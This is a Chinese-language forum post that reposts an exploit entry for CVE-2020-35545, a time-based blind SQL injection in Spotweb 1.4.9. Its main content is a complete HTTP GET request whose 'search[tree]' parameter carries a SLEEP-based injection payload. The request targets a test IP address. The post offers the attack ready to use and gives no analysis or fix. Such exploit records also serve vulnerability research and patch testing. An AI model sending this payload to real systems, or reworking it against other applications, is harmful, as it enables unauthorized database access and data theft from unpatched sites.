跳转到帖子

Spotweb 1.4.9 - 'search' SQL Injection

recommended_posts

发布于
  • Members
# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
# Google Dork: N/A
# Date: 20 December 2020
# Exploit Author: BouSalman
# Vendor Homepage: https://github.com/spotweb/spotweb
# Software Link: N/A
# Version: 1.4.9
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35545


GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
Host: 192.168.99.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
            
  • 查看数 696
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…